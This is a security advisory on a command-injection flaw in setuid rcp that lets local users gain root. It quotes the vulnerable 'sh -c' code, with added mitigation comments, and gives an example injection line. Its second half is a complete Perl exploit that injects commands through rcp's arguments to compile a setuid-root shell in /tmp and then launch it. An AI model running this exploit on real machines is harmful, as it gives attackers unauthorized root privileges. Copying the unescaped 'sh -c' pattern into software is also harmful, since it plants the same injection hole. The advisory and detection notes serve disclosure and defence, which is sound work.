There is a bug in /usr/sbin/rcp that enables an attacker to specify a list of commands which rcp will execute. On some systems the /usr/sbin/rcp program is installed setuid root, allowing local users to gain root privileges.
Credit:
The information has been provided by Roman Drahtmueller, tlabs and Andrew Griffiths.
Example:
$ ls -alF `which rcp`
-rwsr-xr-x 1 root root 14492 Jul 21 22:43
/usr/sbin/rcp
$ cd /tmp
$ echo bla > bob
$ rcp 'bob bobalina; /usrt/bin/id;' 127.0.0.1
uid=500(andrewg) gid=500(andrewg) groups=500(andrewg)
sh: 127.0.0.1: command not found.
Running a quick ltrace on this sequence reveals that rcp does not remove ';' or '`' from its arguments, allowing us to include our own arbitrary commands.
Problematic code:
The code below reveals the sequence vfork(); setuid(getuid()); execve("/bin/sh",args,envp);
Therefore, shell escape tricks in the argument allow you to execute additional commands.
Since the daemon runs `rcp -t <target-dir>` from a shell, the following can happen: `rcp foo remhost:'/tmp;chmod 777 .'`
/* Child side of the rcp command spawn (the vfork() itself is outside this
 * excerpt). First drop privileges to the invoking user, then hand the
 * command string to /bin/sh. The advisory text above describes this as
 * vfork(); setuid(getuid()); execve("/bin/sh", ...). */
if (setuid(userid)) {
fprintf(stderr, "rcp: child: setuid: %s\n",
strerror(errno));
_exit(1);
}
/* Vulnerable point: the whole command string `s` becomes the single
 * argument of "sh -c". Per the example above, `s` contains the
 * user-supplied file/host operand unescaped, so shell metacharacters
 * such as ';' or '`' inside the operand are interpreted by the shell as
 * command separators instead of being part of a file name.
 * Mitigation: do not route user-controlled operands through "sh -c";
 * exec the remote program with an explicit argv vector, or reject
 * operands containing shell metacharacters. Installing rcp without the
 * setuid bit also removes the privilege-escalation impact. */
args[0] = "sh";
args[1] = "-c";
args[2] = s;
args[3] = NULL;
/* Defeat C type system to permit passing char ** to
execve */
argsfoo = args;
memcpy(&argsbar, &argsfoo, sizeof(argsfoo));
/* The environment passed here is the saved one; what `saved_environ`
 * holds is not visible in this excerpt. */
execve(_PATH_BSHELL, argsbar, saved_environ);
/* Only reached if execve() fails. */
_exit(127);
Exploit:
#!/usr/bin/perl -w
# exploits suid privileges on rcp
# Not really tested this but hey
# works on redhat6.2
# not werk on freebsd4.1 stable
#
# bug discovered by
# Andrew Griffiths
#
# Exploit written by tlabs
# greetz to those that know me innit
#
# Please set your rcpfile
# this can be found by doing
#
# ls -alF `which rcp`
#
# have a lot of fun
# Path of the rcp binary whose setuid bit is checked below.
# Note the mismatch with the advisory text above, which names
# /usr/sbin/rcp; the header comment says to set this from `which rcp`.
$RCPFILE="/usr/bin/rcp" ;
# configure above
# Print the script name and author line, then exit successfully.
# No visible line of this script calls USAGE; it is dead code as written.
sub USAGE
{
print $0, "\nWritten by Tlabs\n";
exit(0);
}
# Stop unless the configured rcp binary carries the setuid bit (-u file
# test). Removing the setuid bit from rcp is therefore a direct
# mitigation for this script.
if ( ! -u "$RCPFILE" )
{
printf "rcp is not suid, quiting\n" ;
exit 0;
}
# Write a small C source to /tmp/shell.c (opened in append mode) that
# calls setuid(0)/setgid(0) and then execs /bin/sh.
open(TEMP, ">>/tmp/shell.c")|| die "Something went wrong: $!" ;
printf TEMP "#include<unistd.h>\n#include<stdlib.h>\nint main()\n{" ;
printf TEMP " setuid(0);\n\tsetgid(0);\n\texecl(\"/bin/sh\",\"sh\",0);\n\treturn 0;\n}\n" ;
close(TEMP);
# Create a dummy file in the current directory to serve as rcp's source
# operand.
open(HMM, ">hey")|| die "Something went wrong: $!";
print HMM "Sploit written by tlabs, thanks to Andrew Griffiths for the bug report" ;
close(HMM);
# The injection itself: the first operand contains ';', which rcp passes
# unescaped into its "sh -c" string (see the problematic code above), so
# the text after ';' runs as a separate shell command.
# Detection note: rcp invoked with shell metacharacters in its arguments,
# or a compiler/chmod appearing as a child process of rcp, is a clear
# indicator of this abuse.
system "rcp 'hey geezer; gcc -o /tmp/shell /tmp/shell.c;' localhost 2> /dev/null" ;
system "rcp 'hey geezer; chmod +s /tmp/shell;' localhost 2> /dev/null" ;
# Remove the staging files.
unlink("/tmp/shell.c");
unlink("hey");
unlink("geezer");
printf "Ok, too easy, we'll just launch a shell, lets hope shit went well innit:)\n" ;
# Replace this process with the compiled binary; exec fails if the
# injected commands did not produce /tmp/shell.
exec '/tmp/shell' ;